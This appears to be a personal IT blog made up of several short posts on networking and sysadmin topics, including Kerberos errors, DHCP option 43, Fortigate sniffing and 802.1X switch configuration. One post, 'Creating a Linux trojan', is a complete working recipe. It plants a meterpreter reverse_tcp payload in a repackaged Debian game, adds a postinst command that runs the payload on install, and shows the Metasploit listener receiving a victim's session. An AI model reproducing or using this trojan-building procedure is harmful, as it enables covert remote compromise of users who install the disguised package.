Windows XP Kerberos encryption

If you are having problems with OPC DCOM communication within your domain and are encountering the following errors and symptoms on the client side:

DCOM error code: “0x80070721”
Windows reports error 0x80070721 as: A security package specific error occurred.
unable to receive data updates (asynchronous callbacks).

And the client’s eventviewer’s securitylog is riddled with

status error 0xc00002ee ” An Error occured during Logon.”
Event ID: 4625.

event1

event2

event3

You might want to do a Wireshark capture of your DCOM calls and Kerberos traffic.

You can filter out your Kerberos traffic, by simply adding “kerberos” in the filter field.

filter

If you notice any KRB5 – TGS-REQ packets containing the KRB error KRB5KDC_ERR_S_PRINCIPAL_UNKNOWN and you dig into the value;

Kerberos -> tgs-req -> req-body -> etype and there is no AES encryption type listed when you are running a domain functional level of Windows 2008 or higher then you are probably hitting a Windows XP flaw.

This flaw can be patched on a XP SP3 system with this Hotfix: https://support.microsoft.com/en-us/kb/969442

During my research I noticed I wasn’t the only one encountering this problem.

Creating a Linux trojan

**DISCLAIMER** I am not responsible for any stupid things you do with this information. **DISCLAIMER**

Attack vector
-Take an existing Debian package and insert a payload.
-Convince a user to install the corrupted package.

Setting up the packages
First we create the working environment in which we will be download and corrupt the original package:

~$ mkdir /tmp/packing
~$ cd /tmp/packing

I chose Ninvaders as an example, which is a CLI-based clone of Space Invaders.
It looks like this when played:
ninvaders

We download the .deb package only, but don’t install it:

~$ apt-get --download-only install ninvaders

Get the .deb package into our working directory and extract it there:

~$ mv /var/cache/apt/archives/ninvaders_0.1.1-3_amd64.deb /tmp/packing/
~$ dpkg -x ninvaders_0.1.1-3_amd64.deb work

We create a “DEBIAN” directory where we will put our payload.

~$ mkdir work/DEBIAN

In here we create the control and postinst file.

The control file can be written conform to the Debian Package Policy
or you can copy the content of the original control file in the original package to your new package.
We also need the postinst file, which will run after the package installation (obviously).
In this postinst file, we will put the commands that execute our own payload.

~$ ar -x ninvaders_0.1.1-3_amd64.deb
~$ tar -zxvf control.tar.gz ./control
~$ tar -zxvf control.tar.gz ./postinst

~$ mv control work/DEBIAN/
~$ mv postinst work/DEBIAN/

We create our payload (“ninvaders_credits”) and copy it into out new package’s build folder

~$ msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 X > ninvaders_credits
~$ mv ninvaders_credits work/usr/games/

Append a command to the postinst file, so our payload will be executed

~$ echo "sudo chmod 2755 /usr/games/ninvaders_credits && /usr/games/ninvaders_credits &" >> work/DEBIAN/postinst

Now we rebuild the corrupted package and give the package a better name.

~$ dpkg-deb --build /tmp/packing/work/
~$ mv work.deb ninvaders.deb

Setting up Metasploit
Now we’ll set up our Metasploit listener environment:

~$ msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.2-2014111901 [core:4.10.2.pre.2014111901 api:1.0.0]]
+ -- --=[ 1370 exploits - 763 auxiliary - 219 post        ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 6666
LPORT => 6666
msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.0.1:6666 
[*] Starting the payload handler...

When a victim is gullible enough to install this package, he will be able to play ninvaders but also automatically open a reverse tcp shell to the pre-defined host 192.168.0.1 on port 6666.

Say_Gullible_Slowly

Victim:~$ dpkg -i ninvaders.deb 
Selecting previously unselected package ninvaders.
(Reading database ... 186286 files and directories currently installed.)
Preparing to unpack ninvaders.deb ...
Unpacking ninvaders (0.1.1-3) ...
Setting up ninvaders (0.1.1-3) ...
Processing triggers for man-db (2.6.7.1-1ubuntu1) ...

After the victim (192.168.0.50) installs the package, the attacker will receive the reverse TCP session and can wreak all kinds of havoc.


[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.0.50
[*] Meterpreter session 1 opened (192.168.0.1:6666 -> 192.168.0.50:43035) at 2015-02-26 21:02:18 +0100

Exploiting the victim


meterpreter > sysinfo
Computer     : Victim
OS           : Linux Victim 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux

Conclusion:
Even Linux machines are able to get infected with binaries, if the right precautions aren’t taken. (source checking, MD5sum check, gpg signature checks etc).
But the main issue with trojans are the gullible users, I can even blame myself for running unchecked packages.

sources:
Ninvaders
Binary Linux Trojans

Option 43 Cisco WLC discovery

When your AP boots, it will first discover which controllers are available.
One of the techniques is through its received DHCP options.

Two specific options are used here;

Option 60 and Option 43

Option 60
If you want this subnet only to be used by a certain AP type, you can use this option to check for the “Vendor Class Identifier”(VCI) string.
A list of Cisco-specific VCI strings can be found here.
If you want any device to be able to get a DHCP offer in this subnet, you can just leave out option 60.

Option 43
If you want the AP’s to discover Wireless Lan Controllers through DHCP, you’ll have to put the IP’s of your controllers in here.
This option has a Type-Length-Value (TLV) encoding.

Type
The type is always 0xf1

Length
This is based on the number of IP addresses you want to put into DHCP Offer times 4.
So, if you put 1 address in there, this value would be 0x04.
If you have 2 IP addresses, it will be 0x08 (2 times 4 = 8 and 8 in HEX is 0x08).
If you have 6 IP addresses, it will be 0x18 (6 times 4 = 24 and 24 in HEX is 0x18).

Value
This is based on your IP address.
You should convert every decimal octet to its Hexadecimal values.
If you have a controller at 172.16.20.1, this will become ac101401 (172 = 0xac , 16 = 0x10 , 20 = 0x14 , 1 = 0x01)

So if we take all of this together, and create an example with a single Wireless Controller at 172.16.20.1, this will give us: f104ac101401

If you do a “dhcp debug detail” on your AP, you will see the value:
*Mar  1 00:05:40.027: DHCP: Scan: Vendor specific option 43: F104AC101401

For multiple controllers, the secondary value simply needs to be appended,
e.g. if you have a secondary controller at 172.16.20.2, the value needs to be:
f108ac101401ac101402.

Hexadecimal,Decimal,Binary conversion can be done here.

Windows Registry – Caesar Shift

If you have ever used Process Monitor, to monitor certain processes’ behaviour, you might have noticed some odd-looking words in the registry, which are being queried by explorer.exe.

processmonitor

These are actually normal words, on which a Caesar Shift of 13 has been applied.

In cryptography, a Caesar shift, is one of the simplest and most widely known encryption techniques. It is a type of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of positions down the alphabet, in this case a shift 13.
A shift 13 is self-inverse, so the same code can be used for “encryption” and “decryption”.

If I put some words from the example above, into my Caesar shift 13 Tool ;
Zvpebfbsg.NhgbTrarengrq
vfpfvpcy.rkr
ZqFpurq.rkr
cevagznantrzrag.zfp
freivprf.zfp

microsoft.autogenerated

iscsicpl.exe
mdsched.exe
printmanagement.msc
services.msc

These entries are in the parentkey {CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} – This is a list applications, files etc which have recently been accessed.
Programs that have been launched from commandline will not appear in this list. Nevertheless this decoding can be a useful tool in computer forensics.

 

DNS Spoofing with APATEDNS

If you  quickly want to find out what the malware in your sandbox is resolving, you can use ApateDNS. This free tool will listen for outgoing DNS requests and is able to spoof the answer.

sandbox-meme-catIn my example I started the ApateDNS tool in my sandbox and set the DNS reply IP to my secondary machine -10.150.120.150.
I captured a DNS request to “www.google.be” and its DNS response address was spoofed to 10.150.120.150. This way the malware will start its connection pointed to this IP address -10.150.120.150.

Capture2Next I’ll set up the “TCP/IP Swiss army knife” – netcat.
On my secondary machine, the one with IP 10.150.120.150, I started a netcat listener on port 80.

 ~ $ sudo nc -l 80

If the malware then opens an HTTP connection to “www.google.be”, I will receive its HTTP requests.
example:

GET / HTTP/1.1
Accept: */*
Accept-Language: nl-be
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.google.be
Connection: Keep-Alive
Cookie: PREF=ID=815......:

This might be fast way to find out what connections your malware is trying to make.

(netcat is also available for windows)

Fortigate packet sniffing

After working with a Fortigate for a while, I noticed that the Fortianalyzer tool can become very slow,  mostly this is cause to the disk usage on the box. And when you are troubleshooting priority connections, you just don’t have the time to wait for the box.

aintnobody

So, luckily Fortinet has also implemented a packet sniffer in CLI.
To make use of it, log on to the required VDOM:


FG620B # config vdom
FG620B (vdom) # edit VdomNAME
current vf=VdomNAME:1
FG620B (VdomNAME) # diagnose sniffer packet port5 'src host 10.150.120.150 and port 22 and dst host 203.0.113.1'
interfaces=[port5]
filters=[src host 10.150.120.150 and port 22 and dst host 203.0.113.1]
6.667023 10.150.120.150.46485 -> 203.0.113.1.22: syn 2622767143 
6.679312 10.150.120.150.46485 -> 203.0.113.1.22: ack 1157725779 
...

As you can see, Fortigate requires the command “diagnose sniffer packet” followed by an interface on which to capture (port5).
Finally you can add a filter in the form of a regular tcpdump syntax. In this example I am trying to find traffic from my source host 10.150.120.150 to the destination host 203.0.113.1 on its SSH port (22).

Mounting SFTP resources

As described by damontimm, it is possible to mount a SFTP folder (SSH + FTP) on a Debian based system using SSHFS and Fuse.

I followed his small tutorial, but had to change a few things.

First we install sshfs and add our own username to the fuse group (in this case wannes).

~$ sudo aptitude update
~$ sudo aptitude install sshfs
~$ sudo adduser wannes fuse

As stated on damontimm’s blog and this one, we’ll have to log out/in.
This can be a pain, so we might use this command, to get effective group permissions for this user.

~$ newgrp wannes

Now we create a folder on our own machine, on which we shall mount the remote resource.
In this case, I’ll be mounting the folder /var/www of the remote host.

~$ mkdir sftpfolder
~$ sshfs -o allow_other remote_user@remote_host:/var/www/ sftpfolder

I added the “allow_other” option, because without this option, only the user who ran sshfs can access the mount.

802.1X on HP Procurve

Sometimes I have to implement 802.1X on non-Cisco devices. Yes, even on HP Procurve.

In this situation I have created a setup with an HP Procurve 2610-24/12PWR uplinked with Port 1 to the rest of the network.


hostname "DOT1X-HP-SWITCH"
ip default-gateway 10.90.1.254
snmp-server community "public" Unrestricted

vlan 1
name "DEFAULT_VLAN"
untagged 2-28
ip address dhcp-bootp
no untagged 1
exit

vlan 320
name "VLAN320"
untagged 1
ip address 10.90.1.1 255.255.255.0
exit

vlan 369
name "Access VLAN"
tagged 1
exit

aaa authentication port-access eap-radius
radius-server host 10.150.150.150 key test123
aaa port-access authenticator 2-24
aaa port-access authenticator active
password manager
password operator

A client can now connect to ports 2-24, the HP switch will use 10.150.150.150 as RADIUS server with PSK “test123”.

If the RADIUS server can successfully authenticate and authorize the client, it can for example send these RADIUS attributes back to the switch, which will place the client in VLAN 369.

Access Type= ACCESS_ACCEPT
Tunnel-Private-Group-ID=1:369
Tunnel-Type=1:13
Tunnel-Medium-Type=1:6